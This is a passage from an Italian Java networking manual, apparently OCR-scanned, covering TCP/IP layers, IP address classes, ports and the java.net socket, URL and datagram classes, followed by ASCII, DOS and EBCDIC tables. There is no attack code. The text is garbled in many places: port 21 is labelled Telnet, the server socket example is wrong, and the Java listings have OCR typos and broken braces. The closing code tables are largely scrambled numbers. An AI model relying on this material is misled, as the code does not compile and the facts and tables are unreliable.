Questo strato corrisponde a quello di rete del modello OSI. 

In questo livello vengono gestiti gli indirizzi IP degli host. 

Una panoramica sui metodi di indirizzamento e di instradamento verranno visti 
tra breve. 

Tra i protocolli di questo strato ritroviamo IP (Internet Protocol), ARP 
(Address Resolution Protocol), RARP (Reverse Address Resolution Protocol) ecc. 


STRATO DI ACCESSO ALLA RETE 


Anche a questo livello del modello DoD avviene una gestione simile a quella del 
livello fisico del OSI. 

In pratica i pacchetti vengono tramutati in sequenze di bits. 

In questo strato viene anche fornita una supervisione sugli indirizzi hardware. 
Le seguenti sono alcune delle tecnologie utilizzate per implementare questo 
strato 


X25, PPP, EIA 
INTRODUZIONE ALLA PROGRAMMAZIONE DI RETE 


Fino ad ora abbiamo visto alcuni concetti legati alla strutturazione di una rete 
sia dal punto di vista logico che da quello fisico. 

Si e’ parlato di segmenti di rete o sotto reti. 

Internet possiamo quindi definirla come una rete di reti sulla quale esistono 
sistemi host che possiedono almeno un indirizzo che lo identifica in modo 
univoco definito da quello che abbiamo visto come IP. 

Questo numero IP e’ attualmente un numero a 32 bits costituito da due parti, una 
relativo alla rete ed una relativa all’ host. 

La prima parte dell’ IP, infatti, definisce la rete sulla quale risiede l’ host. 
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Ogni macchina appartenente ad una rete condivide con le altre macchine la prima 
parte dell’ indirizzo IP. 

Esiste un organo competente, il NIC (Network Information Center), il quale 
assegna a un’ azienda un blocco di indirizzi IP. 

Per ottenere un numero di identificazione relativo alla propria rete bisogna 
contattare il NIC a hostmaster@internic.net 

Come abbiamo gia’ detto un indirizzo IP e’ costituito da un numero a 32 bits il 
quale sarebbe molto complesso da tenere presente se espresso nella sua notazione 
binaria originale. 

Immaginatevi un indirizzo del tipo : 0110 0110101101000110 011010110100. 

Per semplificare la rappresentazione dell’ indirizzo e’ stata introdotta una 
rappresentazione a quaterne nella quale un indirizzo IP viene rappresentato 
nella forma x.y.z.j nella quale ogni lettera e’ rappresentata da un numero 
compreso tra 0 e 255. 

Per esempio un indirizzo di un sistema host potrebbe essere 198.102.96.12. 
Ciascun numero rappresenta un quartetto ovvero 8 bits di un indirizzo Internet. 
Nell ‘esempio precedente i primi due numeri potrebbero essere l’ indirizzo della 
rete mentre gli altri due l’ indirizzo della macchina su questa. 

Come dicevamo prima il NIC assegna gli indirizzi IP. 

In base alla grandezza della societa’ gli viene assegnata una rete di classe 
differente. 

In base al numero dei segmenti che costituiscono la rete ed al numero dei nodi 
esistono tre classi di reti e precisamente 


CLASSE FORMATO NUM. MAX RETI NUM. MAX NODI 
CLASSE A Rete. Nodo .Nodo.Nodo 127 16.777.216 
CLASSE B Rete .Rete.Nodo.Nodo 16.384 65.534 

CLASSE C Rete.Rete.Rete.Nodo 2.097.152 254 


Nel caso di una rete di classe A i primi otto bits, quelli assegnati, 
corrispondenti al numero del segmento di rete possono assumere valori compresi 
tra 0 e 126 (vedremo che gli altri vengono utilizzati per motivi particolari) 
per cui e’ possibile implementare 127 reti di classe A. 


Le societa’ con reti appartenenti a questa classe sono IBM, HP, APPLE ecc. 
(considerate che ce ne sono solo 127 indirizzi di classe A). 


Microsoft sono invece esempi di indirizzi di reti di classe B. 


Gli indirizzi di classe C possiedono invece le prime tre quartine assegnate dal 
NIC. 

Di fatto esiste anche una classe D i cui indirizzi sono utilizzati per il 
multicast. 

Nel JDK 1.1 la Sun ha inserito la classe Multicast nel package 
java.net.Multicast facendola discendere dalla classe Datagram. 

Un indirizzo multicast e’ un intervallo compreso tra 224.0.0.0 e 
239.255.255.255. 

La trasmissione multicast si basa sull’ identificazione di tutti i router di una 
rete ed e’ finalizzata ad inviare i dati verso piu’ destinazioni. 

In pratica in Java e’ possibile utilizzare la classe che gestisce il multicast 
solo su di una rete locale. 

Esistono alcuni indirizzi che possiedono scopi particolari come ad esempio 


127.0.0.1 Funzione di circuito chiuso in cui ogni messaggio viene rispedito al 
mittente. 

X.y.z.255 Valore di broadcast che viene utilizzato per inviare un pacchetto a 
tutti i sistemi di una sotto rete. 

X.y.Z.1 E’ l’ indirizzo del router di una sotto rete. 


Tutto questo visto fino ad ora e’ quanto riguarda la strutturazione di una rete. 
Esistono alcuni concetti che invece riguardano l’ utente (client) che accede ad 
un host per navigare sulla rete. 
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Infatti il termine Socket esprime un terminale di comunicazione ovvero uno dei 
due estremi di una connessione. 

A questo riguardo bisogna ancora 
dare un occhiata al concetto di 
porta. 

Normalmente un computer dispone di 
un solo accesso fisico sulla rete. 
Tutti i dati destinati ad un sistema 


arrivano mediante questa 
TCP or UDP connessione. 

In ogni caso i dati potrebbero 

essere destinati a diverse 


applicazioni in esecuzione sul 
sistema. 

Come puo’ il computer capire a quale applicazione e’ destinato il pacchetto di 
dati ricevuto. 

Semplice. Tramite il concetto di porta ! 

I dati trasmessi su Internet sono identificati, come abbiamo gia’ visto, dall’ 
indirizzo a 32 bits che identifica il sistema destinatario e dal numero di 
porta. 


Il numero di porta e’ costituito da un numero a 16 bits che i protocolli TCP e 
UDP utilizzano per identificare l’ applicazione alla quale sono destinati i dati 
inviati. 

In una connessione il protocollo crea un Socket collegato ad un numero specifico 
di porta. 

Alcuni numeri di porta hanno degli scopi predefiniti come ad esempio 


cerer@ 


2 

79 Finger 
80 Http 
110 Pop3 


Ad esempio se si creasse un Socket utilizzando la porta 25 e si inviassero dei 
dati tramite uno stream creato su questo socket questi verrebbero utilizzati dal 
demone per l’ invio della posta. 

Infatti andando ad analizzare i sorgenti della classe sun.net.smtp, come vedremo 
successivamente, ci accorgeremmo che la gestione dell’ invio della mail viene 
appunto gestita in questo modo. 

Un po’ del tipo 


Socket sock = new Socket(“www.bernardotti.al.it”, 25); 
PrintStream outStream = new PrintStream(sock.getOutputStream()); 


In java.net ritroviamo un insieme di classi utilizzate dal TCP come ad esempio 
la classe URL, la classe URLConnection, la classe Socket e la classe 
ServerSocket. 

Altre classi come ad esempio la classe DatagramPacket, la classe DatagramSocket 
e quella MulticastSocket sono utilizzate dal protocollo UDP. 

L'utilizzo dei socket permette di creare software legati ai processi di rete per 
creare sistemi automatizzati per cercare di accedere a sistemi remoti. 

Nella tabella precedente potete vedere che la creazione di un socket agganciato 
alla porta 21 permette di utilizzare lo stream abbinato a questa per funzioni 
Telnet. 
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Grazie a telnet potete accedere alle varie login dei sistemi per cui .. chi più 
ne ha più ne metta ! 


LA CLASSE URL 


Una delle classi fondamentali, che abbiamo visto nel modulo precedente, e’ la 
classe URL. 

La classe URL rappresenta un puntatore ad una risorsa presente su un WEB la 
quale viene reperita utilizzando l’ Uniform Resource Locator. 

Una risorsa potrebbe essere un normalissimo file o directory od un oggetto piu’ 
complesso come ad esempio un interrogazione su un database. 

Un URL normalmente viene suddiviso in due parti 


HTTP:// www.bernardotti.al.it 
Protocollo Risorsa 


La prima parte specifica il protocollo mentre la seconda la risorsa. 

Esistono diversi costruttori mediante i quali e’ possibile creare una risorsa 
URL. 

Il piu’ semplice e’ il seguente 


URL sunSoft = new URL(“http://www.Javasoft.com/”); 


Esistono altri costruttori che permettono di specificare le risorse in modo 
differente, utilizzando anche il numero di porta se necessario. 
Ad esempio 


URL sunSoft = new URL(“http”, “www.javasoft.com”, “/index.html”); 


, 


e’ equivalente a 


URL sunSoft = new URL(“http://ww.javasoft.com/index.html”); 
Ogni costruttore URL puo’ generare un eccezione legata al protocollo errato o 


alla risorsa sconosciuta. 
L’ eccezione puo’ essere intercettata con il seguente costrutto 


try { 
URL sunSoft = new URL(“http://www.javasoft.com/”); 
} catch(MalformedURLException e) { .. handler all’ eccezione ...} 


La classe URL contiene inoltre diversi metodi destinati a ricevere informazioni 
legate alla URL stessa. 


Fate attenzione che non e’ detto che tutte le informazioni debbano essere 
presenti. 


Vediamo i seguenti metodi 
getProtocol() Ritorna il protocollo 
getHost() Ritorna il nome dell’ host 


getPort() Ritorna il numero della porta o -1 se non e’ stata specificata 
durante la creazione 


getFile() Ritorna il nome del file 


Alcune volte dopo che e’ stata creata un URL e’ possibile utilizzare il 
metodo openConnection() per creare un collegamento tra il programma Java e 
l’ URL stesso. 
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Per esempio e’ possibile creare una connessione con un sito, Altavista ad 
esempio, mediante il codice 


try { 
URL urlTmp = new URL("http://ww.altavista.digital.com/"); 


URLConnection urlCon = urlTmp.openConnection(); 


} 
catch (MalformedURLException e) {} 
catch (IOException e) {} 


Se la connessione ha avuto successo questa potra’ essere utilizzata per 
funzioni di lettura e di scrittura. 

Molte funzioni legate al reperimento di immagini, suoni, files ecc. 
necessitano dell’ URL. 

Ad esempio 


public Image getImage(URL url) 
public Image getImage(URL url, String name) 


I seguenti metodi mostrano alcuni esempi pratici. 

Image imaget = getImage(getCodeBase(), "imageFile.gif"); 

Image image2 = getImage(getDocumentBase(), "anImageFile.jpeg"); 

Image image3 = getImage(new URL("http://java.sun.com/graphics/people.gif")); 


Esistono due metodi della classe Applet, utilizzati moltissime volte, che 
permettono di ricavare, in ordine 


1. L’ URL della pagina che chiama l’ applet 
2. L’ URL dell’ applet 


Le funzioni sono in ordine 


Applet .getDocumentBase() 
Applet.getCodeBase() 


Come abbiamo appena visto i due metodi sono stati utilizzati nel punto in cui 
era necessario fornire come argomenti l’URL dell’ host da cui era stato caricato 
l’ applet. 


LA CLASSE URLConnection 


Questa classe contiene molti metodi utili quando si lavora con URL HTTP. 
Fate attenzione che si tratta di una classe astratta e quindi non puo’ 
essere istanziata direttamente. 

Invece di utilizzare un costruttore vedremo come puo’ essere utilizzato il 
metodo openConnection() della classe URL 

La seguente funzione mostra come eseguire la lettura sfruttando la classe 
URLConnection. 

Esempio 


import java.net.*; 
import java.io.*; 


public class URLConnReadr { 
public static void main(String[] args) throws Exception { 
URL tmpUrl = new URL("http://ww.altavista.digital.com/"); 
URLConnection URLConn = tmpUrl.openConnection(); 
BufferedReader in = new BufferedReader( new 
InputStreamReader(URLConn.getInputStream())); 
String inputLine; 
while ((inputLine = in.readLine()) != null) 
System.out.println(inputLine); 
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in.close(); 


} 


Nella classe URLConnection esistono un grosso numero di metodi e 
variabili. 

Due di queste variabili e due metodi che settano queste variabili sono 
degni di nota in quanto permettono di eseguire funzioni di input e di 
output sulla connessione creata. 

In pratica le variabili sono 


doOutput 
doInput 


A seconda del valore che viene settato (true/false) si indica che l’ 
applet vuole eseguire, in ordine, dell’ output e dell’ input sulla 
URLConnection. 

Queste variabili possono essere settate dai metodi 


void setDoOutput(boolean) 
void setDoInput(boolean) 


Altri due metodi, uno visto nel codice in alto, permettono di ricavare 
rispettivamente un stream di output ed uno di input dall’ URLConnection. 
I due metodi sono 


OutputStream getOutputStream() 
InputStream getInputStream() 


LA CLASSE InetAddress 


Esistono alcune classi che spesso risultano essere utili come ad esempio 
la InetAddress la quale permette di creare e registrare degli indirizzi 
utilizzati da altre classi. 

Quest’ ultima classe di fatto non possiede costruttori pubblici ma in 
compenso dispone di diversi metodi statici che possono essere utilizzati 
per creare delle istanze della classe. 

Tutti i metodi sono statici e devono essere utilizzati nel seguente modo. 


InetAddress addr InetAddress.getByName(”“www.javasoft.com”); 
InetAddress addr InetAddress.getLocalHost(); 
InetAddress addr[] = InetAddress.getAllByName(“ww.Javasoft.com”); 


Le precedenti funzioni generano un UnknownHostException se il sistema non 
e’ collegato a un DNS. 

Per DNS si intende Domain Name Server. 

In altre parole il TCP/IP permette di far riferimento agli host di una 
rete mediante appositi nomi invece di usare l’ indirizzo IP. 

In pratica il DNS e’ il metodo che ci permette di riferirci ad un sistema 
quello che normalmente costituito dal nomeHost.nomeDominio (i vari 
www.Jjavasoft.com, www.bernardotti.al.it ecc.) 

Inoltre la classe InetAddress include numerose variabili e funzioni per 
memorizzare indirizzi host Internet. 


public String hostName Questa variabile contiene il nome dell’ 
host nella forma www.XxX.yy 

public int address L'’ indirizzo numerico dell’ host (x.y.z.]) 

public String localHostName Contiene il nome dell’ host locale ovvero 
quello del computer su cui viene eseguita ll’ 
applicazione. 
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Dopo questa panoramica sulla classe URL utilizzata nella prima parte del 
programma vediamo una seconda parte ovvero quella che si interessa dell’ 
invio di messaggi all’ host. 

La classe e’ suddivisa in due parti. 

La prima crea la maschera video in cui viene richiesto di inserire l’ 
email del mittente e il testo del messaggio. 

Il server mail utilizzato per l’ invio viene specificato nei parametri 
della pagina HTML mediante la voce 


<param name="mailhost” value="www.bernardotti.al.it"> 


La seconda parte e’ quella invece che si interessa della creazione del 
messaggio e del suo invio. 

Come abbiamo gia’ detto esiste una porta specifica, la 25 , che permette 
di comunicare con il demone mail presente sul server. 

Questo non significa che, dopo aver aperto un Socket su quella porta, 
tutto cio’ che verra’ scritto verra’ inviato come mail. 

I dati scritti su tale socket dovranno essere formattati in un determinato 
modo per essere considerati un messaggio valido e quindi per essere 
smistato. 

Le informazioni dovrebbero avere la seguente formattazione 


HELO host mittente 

MAIL FROM: mittente 

RCPT TO: ricevente 

DATA 

Messaggio (qualsiasi numero linee) 


QUIT 


Esiste una classe in sun.net.smtp che permette la gestione del messaggio. 
Nel nostro modulo riscriveremo completamente la parte che si interessa 
della creazione e dell’ invio del messaggio in modo tale da vedere in 
funzione alcune classi legate alla gestione della rete. 


LA CLASSE Socket 


Nella parte che si interessava dell’ invio del messaggio c’era la seguente 
parte di codice 


sock = new Socket( hostid, port ); 
reply = new DataInputStream( sock.getInputStream() ); 
send = new PrintStream( sock.getOutputStream() ); 


Un socket puo’ essere considerato come il punto di connessione a due vie 
esistente tra due programmi che girano in rete. 

In altre parole un socket e’ la rappresentazione in Java di una 
connessione TCP. 

In pratica quando si vuole eseguire un collegamento ad un sistema in rete 
si conosce l’ indirizzo di questo. 

Mediante il numero di porta e’ possibile richiedere la connessione ad un 
software specifico che gira su questa macchina. 

Nel nostro caso abbiamo utilizzato il socket aperto utilizzando il nome 
del server mail e la porta 25 (quella del demone mail) per aprire uno 
stream di output sul quale scrivere i dati relativi al messaggio da 
inviare. 

Come e’ possibile vedere anche dalle due righe di codice appena riportate 
la fase di scrittura si suddivide in due fasi 


1 apertura del socket sul host + numero di porta 
2 apertura in scrittura di uno stream 


Come avrete visto gli stream aperti sono di fatto due. 


Pagina 452 di 991 


Uno per scriverci i dati del messaggio e l’ altro per leggere le repliche 
del demone mail. 

E’ possibile utilizzare la classe socket per la creazione di software 
client/server. 

Supponiamo che sul server giri un programma relativo ad un gioco che apre 
un socket su una fatidica porta 2222. 

Qualsiasi client potra’ comunicare con tele software aprendo anch'esso un 
socket utilizzando il nome dell’ host e il numero di porta 2222. 

Il software sul sever www.aquilotto.com avra’ la forma 


Socket sock = new Socket(2222); 
Sul client invece si avra’ 
Socket sock = new Socket(“www.aquilotto.com”, 2222); 


Chiaramente questo e’ il concetto di base in quanto nel caso di una 
gestione reale multiutente si dovrebbe eseguire un implementazione tramite 
thread. 


LA CLASSE ServerSocket 


Questa classe rappresenta un connessione TCP in attesa di ricezione. 

Non appena viene ricevuta una richiesta di connessione la classe 
ServerSocket restituisce un oggetto Socket. 

Ad esempio 


ServerSocket servSock = new ServerSocket(5555); 
definisce un server che monitorizza la porta 5555. 
Socket incoming = servSock.accept(); 


chiede di attendere fino a che un client non si connettera’ alla porta 
5555. 


A quel punto il metodo accept ritornera’ restituendo un socket che potra’ 
essere utilizzato per la comunicazione con il client. 

Vediamo ora un’ altra parte del codice che risultera’ interessante per il 
fatto che mostra l’ utilizzo di risorse URL relative ai maggiori motori di 
ricerca. 

Normalmente per fare ricerche e’ necessario connettersi ad un determinato 
motore di ricerca. 

La seguente parte di codice mostra una maschera in cui viene richiesto di 
inserire i dati da ricercare e il motore su cui eseguire la ricerca. 

Una delle migliorie apportate nella versione 1.1 del JDK e’ che la classe 
ServerSocket e la classeSocket non sono piu’ definite come final percui 
possono essere estese. 

Il seguente esempio mostra una possibilita’ fornita con la versione 1.1. 


class SSLServerSocket extends ServerSocket { 


public Socket accept () throws IOException 


Il 
SSLSocket s = new SSLSocket (certChain, privateKey); 


// create an unconnected client SSLSocket, that we'll 
// return from accept 


implAccept (Ss); 
s.handshake (); 
return S; 


3 


Pagina 453 di 991 


Ji 
class SSLSocket extends java.net.Socket { 


public SSLSocket(CertChain c, PrivateKey k) { 
super(); 


GESTIONE ECCEZIONI 


Nelle argomentazioni viste precedentemente abbiamo utilizzato ll’ 
intercettazione delle eccezioni che potevano essere generate dall’ 
utilizzo delle varie classi. 

Vediamo ora di approfondire il discorso in quanto l’ argomento ricopre un 
ruolo molto importante. 

Avevamo accennato, parlando delle URL, ad un eccezione che veniva generato 
nel caso in cui si verificava l’ impossibilita’ di accedere, per problemi 
di errata definizione del formato, ad una risorsa. 

L’ eccezione in questione era la MalformedURLException. 

Nei package in cui sono presenti le classi viste sono definite altre 
eccezioni che ci risultano utili per l’ identificazione degli 
inconvenienti legati all’ uso di questi packages. 

Vediamone un elenco con a fianco i significati 


BindException Dovuto all’ impossibilita’ (porta gia’ in 
uso) di collegare il socket 
ConnectException Rifiuto della connessione da parte del 
socket remoto 
MalformedURLException Interpretazione errata del URL 
NoRouteToHostException Blocco da parte di un firewall. 
Impossibilita’ di raggiungere l’ host. 
ProtocolException Errore nel protocollo del socket 
SocketException Eccezione del socket 
UnknownHostException Errore di risoluzione del nome host. 
UnknownServiceException La connessione non supporta il servizio 


Nel package sun.net invece ritroviamo le seguenti eccezioni 


TelNetProtocolException Errore del protocollo telnet 
SmtpProtocolException Errore nel protocollo smtp 
FtpLoginException Errore accedendo al server FTP 
FtpProtocolException Errore del protocollo FTP 
NntpProtocolException Errore del protocollo Nntp 


Inizialmente, quando parlavamo della struttura della rete, avevamo visto 
la definizione del protocollo UDP e avevamo anche detto che esisteva una 
serie di classi che erano apposite per tale protocollo. 

Si trattava delle classi per i datagrammi. 


LA CLASSE DATAGRAMMA 
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Inizialmente avevamo detto che i datagrammi vengono utilizzati per inviare 
in modo indipendente dei pacchetti di dati da un applicazione ad un'altra 
senza garantirne l’ arrivo. 

I pacchetti di dati inviati tramite datagrammi in genere sono 
indipendenti. 

Per fare un esempio pratico vediamo due moduli, uno per il server e uno 
per il client, che permettono di inviare le informazioni degli utenti 
collegati ad un sistema Unix. 

Supponiamo che esista un programma che a tempi regolari esegua un who 
(istruzione Unix per vedere l’ elenco degli utenti collegati al sistema) e 
che scriva i dati in un file denominato users.txt. 

Il programma server dovra’ attendere una richiesta di invio di un 
datagramma da parte di un software client e dovra’ inviare il contenuto 
del file. 


import java.io.*; 
import java.net.*; 
import java.util.*; 


public class whoClient { 
public static void main(String[] args) throws IO0Exception { 
if (args.length != 1) { 
System.out.println("Usage: java whoClient <hostname>"); 
return; 


// Crea il datagramma 

DatagramSocket socket = new DatagramSocket(); 

byte[] buffer = new byte[512]; 

InetAddress address = InetAddress.getByName(args[0]); 

// Invia la richiesta 

DatagramPacket packet = new DatagramPacket(buffer, buffer.length, address, 
5225); 

socket.send(packet); 

// Prende la risposta 

packet = new DatagramPacket(buffer, buffer.length); 

socket.receive(packet); 

// Lo visualizza i dati ricevuti 

String received = new String(packet.getData(), 0); 

System.out.println("User(s) connected: " + received); 

socket.close(); 


} 
Vediamo ora il software del server. 


import java.io.*; 
import java.net.*; 
import java.util.*; 


public class whoServerThread extends Thread { 
protected DatagramSocket socket = null; 
protected BufferedReader in = null; 
protected boolean flag = true; 


public whoServerThread() throws IO0Exception { 
this("WhoServerThread"); 
} 


public whoServerThread(String name) throws IOException { 
super(name); 
socket = new DatagramSocket(5225); 
try { 
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in = new BufferedReader (new 
FileReader("users.txt")); 
} catch (FileNotFoundException e) { 
System.err.println("Could not open who file. "); 
} 


} 
public void run() { 
byte[] buf = new byte[256]; 
String returnValue; 
while (returnValue = in.readLine()) != null) { 
try { 
// Riceve la richiesta 
DatagramPacket packet = new DatagramPacket(buf, 
buf.length); 
socket.receive(packet); 
buff = returnValue.getBytes(); 
// send the response to the client at "address" and 
"port" 
InetAddress address = packet .getAddress(); 
int port = packet.getPort(); 
packet = new DatagramPacket(buf, buf.length, 
address, port); 
socket.send(packet); 
} catch (IO0Exception e) { 
e.printStackTrace(); 


} 


socket.close(); 
in.close(); 


} 


Con la versione 1.2 del JDK i packages legati alla gestione della rete 
sono ulteriormente aumentati facendo diventare il numero dei metodi a 
disposizione una cosa enorme. 

Veramente un infinita’ di metodi sufficenti a perdersi dentro. 

A peggiorare la situazione ci sono anche le classi create da programmatori 
e software house che invadono il mercato sia shareware che commerciale. 
Sun esce con la versione 1.2 ed aggiunge le classi Swing e JFC .. Microsoft 
arriva con la sua 3.0 e inserisce AFC. 

Ogni botta sono centinaia di metodi che si aggiungono a quelli gia’ 
esistenti. 

Senza contare che quello che oggi e’ recentissimo domani e 
sorpassatissimo. 

Con Java e’ proprio il caso di dire 


# 


di I " 


. chi vivra’ vedra’ 
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TABELLE UTILI 


5A 
5B 
5C 
5D 
DE 
5F 


90 
91 
92 


93 
94 
95 
96 
97 


60 
61 
62 
63 


98 
99 


100 


101 
102 


103 
104 
105 
106 
107 


108 
109 


110 
111 
112 


113 
114 
115 
116 
117 


118 


119 
120 


121 
122 


123 


124 
125 


126 
127 


7F 


128 
129 


81 


130* 


131* 


84 " 


85 


132* 


133* 


134* 


135* 


136* 


2B 
2C 
2D 
2E 
2F 


43 
44 
45 
46 
47 


30 
31 
32 
33 
34 
35 
36 
37 
38 


48 
49 


50 
51 
52 


53 
54 
55 
56 
57 


39 


3A 
3B 
SC 
3D 
3E 
3F 


58 
59 


60 
61 
62 


63 


40 


64 
65 
66 
67 


41 


42 


43 


44 
45 


68 
69 


46 


70 
T1 
72 
73 
14 
75 
76 
TI 
78 
79 
80 
81 
82 


47 


48 


49 


4A 
4B 


4C 
4D 


4E 


4F 


50 
51 
52 
53 
54 
55 
56 
57 


83 
84 
85 
86 
87 


58 
59 


88 
89 


TBELLA CODICI ASCII 


Hex Char Code 


Dec 


NUL 
SOH 
STX 


00 
01 
02 
03 
04 
05 
06 


ETX 
EOT 
ENQ 
ACK 
BEL 
BS 
HT 
LF 
VT 


07 


08 
09 


OA 
OB 
OC 
OD 


10 


11 
12 


FF 
CR 
so 


13 


OE 


14 
15 


SI 


OF 


SLE 


10 
11 


12 


16 


CS1 
DC2 
DC3 
DC4 


17 


18 


13 


19 


14 


20 
21 
22 
23 
24 
25 


NAK 
SYN 


15 
16 


ETB 
CAN 
EM 


17 


18 


19 


SIB 
ESC 


1A 
1B 


26 
27 


FS 
GS 


1C 


28 
29 
30 


1D 


RS 
US 


(space) 


1E 


1F 


31 
32 


20 


21 
22 
23 
24 
25 
26 


33 


34 
35 


36 


% 


37 


38 


27 


39 


28 
29 


40 


41 


2A 


42 
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137* 89 


138* 8A S 
139* 8B < 
140* 8C (5 
141 8D 

142 8E Z 
143 8F 

144 90 

145 91 dl 
146 92 1 
147* 93 di 
148* 94 di 
149* 95 Ù 
150* 96 - 
151* 97 —- 
152* 98 ta 
153* 99 Da 
154* 9A $ 
155* 9B > 
156* 9C e 
157 9D 

158 9E Z 
159* 9F Y 
160 AO 

161 Al i 
162 A2 (i) 
163 A3 £ 
164 A4 D 
165 A5 Y 
166 A6 
167 AT 8 
168 A8 Ù 
169 A9 © 
170 AA a 
171 AB « 
172 AC 2 
173 AD - 
174 AE ® 
175 AF — 
176 BO 9 
177 B1 + 
178 B2 2 
179 B3 3 
180 B4 

181 B5 u 
182 B6 T 
183 B7 

184 B8 E 
185 B9 1 
186 BA o 
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187 BB» 237 ED i 
188 BC % 238 EE Î 
189 BD % 239 EF i 
190 BE % 240 FO è 
191 BF 6% 241 F1 fi 
192 c0 À 242 F2  ò 
193 CL A 243 F3° 6 
194 c2 À 244 F4 6 
195 c3 A 245 F5 6 
196 c4 À 246 F6 è 
197 C5 A 247 F7 + 
198 C6° £ 248 F8 0 
199 C7 € 249 F9 Ùù 
200 C8 È 
201 co É 250 FA 
202 CA È 251 FB 
203 CB È 252 FC ù 
204 cc Ì 253 FD y 
205 co Î 254 FE 
206 CE Î 255 FF Y 
207 cc Î 
208 DO 
200 DI N 
210 D2  Ò 
Did DS 0 
212 D4 Ò 
213 D5 0 
214 DE © 
215 D7 x 
216 D8 9 
217 D9 Ù 
218 DA U 
219 DB 0 
220 DC Ù 
221 DD Y 
222 DE 
223 DFE BR 
224 EO è 
225 E1 
226 E2 A 
227 E3 A 
228 E4 A 
229 E5 A 
230 E6 ® 
231 E7 6 
232 E8 è 
233 E9 Éé 
234 EA è 
235 EB è 
236 EC ì 


DE 
5F 


94 
95 
96 
97 


60 
61 
62 
63 


98 
99 


100 


101 
102 


103 
104 
105 


106 
107 


108 
109 


110 
111 
112 


113 
114 


115 
116 
117 


118 
119 


120 


121 
122 


123 


124 
125 


126 
127 


7F 


128 


129 


130 
131 
132 


133 
134 
135 


Co) 


86 


136 


137 


138 
139 


140 


141 
142 


2C 
2D 
2E 
2F 


44 
45 
46 
47 


30 
31 
32 
33 
34 
35 


48 
49 


50 
51 
52 


53 
54 
55 


36 
37 
38 


56 
57 


39 


3A 
3B 
3C 
3D 
3E 
3F 


58 
59 


60 
61 
62 


63 


40 


64 
65 
66 
67 


41 


42 


43 


44 
45 


68 
69 


46 


70 
71 
72 
73 
74 
75 
76 
TI 
78 
79 
80 
81 
82 


47 


48 


49 


4A 
4B 


4C 
4D 


4E 


4F 


50 
51 
52 
53 
54 
55 
56 
57 
58 
59 
5A 
5B 
5C 
5D 


83 
84 
85 
86 
87 


88 
89 


90 


91 
92 


93 


TABELLA CODICI DOS 


Hex Char Code 


Dec 


NUL 
SOH 
STX 


00 


01 
02 


ETX 


03 
04 
05 


EOT 
ENQ 
ACK 


06 


BEL 
BS 
HT 
LF 
VT 


07 


08 
09 


OA 
OB 
OC 
OD 


10 


11 


FF 
CR 
so 


12 


13 


OE 


14 
15 


SI 


OF 


SLE 
CS1 


10 


16 


11 
12 


17 


DC2 
DC3 
DC4 


18 


13 
14 


19 


20 


NAK 
SYN 


15 


21 
22 
23 


16 


ETB 
CAN 
EM 


17 


18 
19 


24 
25 
26 
27 


SIB 


1A 
1B 


ESC 


FS 
GS 
RS 
US 


1C 
1D 
(space) 


28 
29 


1E 


30 


1F 


31 
32 


20 


21 
22 
23 
24 


33 


34 
35 


36 


25 % 


26 


37 


38 


27 


39 


28 
29 


40 


41 


2A 
2B 


42 


43 
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F3 
F4 
F5 


243 
244 
245 
246 
247 


F7 


248 
249 


FA 
FB 
FC 


250 
251 
252 


253 
254 
255 


FE 
FF 


C1 


193 
194 
195 


C2 


C3 


C4 
C5 


196 
197 


C6 


198 
199 


C7 


C8 


200 
201 
202 


C9 


CA 
CB 


203 
204 
205 
206 
207 


CC 
CD 


CE 


CF 


DO 
DI 
D2 


208 
209 


210 
211 
212 


D3 


D4 
DS 


213 
214 
215 
216 
217 


D6 


D7 


D8 
D9 


DA 
DB 


218 
219 


DC 
DD 
DE 
DF 


220 
221 
222 


223 
224 
225 
226 
227 


EO 


E2 


E3 


E4 
E5 


228 
229 


230 
231 
232 


E7 


E8 
E9 


233 
234 
235 
236 
237 


EA 
EB 
EC 
ED 
EE 
EF 


238 
239 


FO 


240 
241 
242 


F1 
F2 


143 


144 
145 
146 
147 
148 
149 
150 


151 
152 
153 


154 
155 
156 
157 
158 
159 
160 


9E 


161 
162 
163 


164 
165 
166 
167 
168 
169 
170 


Z 


AS 


% 


AB 


171 
172 
173 


« 


AD 


AE » 


174 
175 
176 


AF 


BO 


B1 
B2 
B3 
B4 
B5 
B6 


177 
178 
179 


180 
181 
182 
183 


B7 


B8 
B9 


184 
185 
186 
187 
188 
189 
190 


BA 
BB 
BC 
BD 


BE 


BF 


191 
192 


CO 
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TABELLA EBCDIC 


Dec Hex Char Code 
(0) 00 € NUL 
1 01 € SOH 
2 02 € STX 
3 03 € ETX 
4 04 € PF 
5 05 € HT 
6 06 € LC 
7 07 € DEL 
8 08 

9 09 € RLF 
10 0A € SMM 
11 OB € VT 
12 OC € FF 
13 OD € CR 
14 OE € So, 
15 OF € S1 
16 10 € DLE 
17 11 € DC1 
18 12 € DC2 
19 13 € DC3 
20 14 € RES 
21 15 € NL 
22 16 € BS 
23 17 € IL 
24 18 € CAN 
25 19 € EM 
26 1A € CC 
27 1B 

28 1C € IFS 
29 1D € IGS 
30 1E € IRS 
31 1F € IUS 
32 20 € DS 
33 21 € SOS 
34 22 € FS 
35 23 

36 24 € BYP 
37 25 € LF 
38 26 € ETB 
39 27 € ESC 
40 28 

41 29 

42 2A € SM 
43 2B 

44 2C 

45 2D € ENQ 


Pagina 461 di 991 


46 2E € ACK 96 60 - 

47 2F € BEL 97 61 

48 30 98 62 

49 31 99 63 

50 32 € SYN 100 64 

51 33 101 65 

52 34 € PN 102 66 

53 35 € RS 103 67 

54 36 € UC 104 68 

55 37 € EOT 105 69 

56 38 106 6A | 

57 39 107 6B i 

58 3A 

59 3B 108 6C % 

60 3C € DC4 109 6D = 

61 3D € NAK 110 6E > 

62 3E 111 6F ? 
112 70 

63 3F € SUB 113 72 

64 40 € SP 114 72 

65 41 115 73 

66 42 116 74 

67 43 117 75 

68 44 118 76 

69 45 119 TI 

70 46 120 78 

71 47 121 79 \ 

72 48 122 TA î 

73 49 123 7B # 

74 4A ( 124 TC @ 

75 4B . 125 7D : 

76 4C < 126 TE = 

TI 4D ( 127 7F di 

78 4E + 128 80 

79 4F | 129 81 a 

80 50 & 130* 82 b 

81 51 131* 83 (o; 

82 52 132* 84 d 

83 53 133* 85 e 

84 54 134* 86 f 

85 55 135* 87 g 

86 56 136* 88 h 

87 57 137* 89 i 

88 58 138* 8A 

89 59 139* 8B 

90 5A ! 140* 8C 

91 5B $ 141 8D 

92 5C È 142 8E 

93 5D ) 143 8F 

94 DE ; 144 90 

95 5F 2 145 91 j 


146 92 k 
147* 93. 1 
148* 94m 
149* 95 n 
150* 96 0 
151* 97 p 
152* 98 q 
153* 99 r 
154* 9A 
155* 9B 
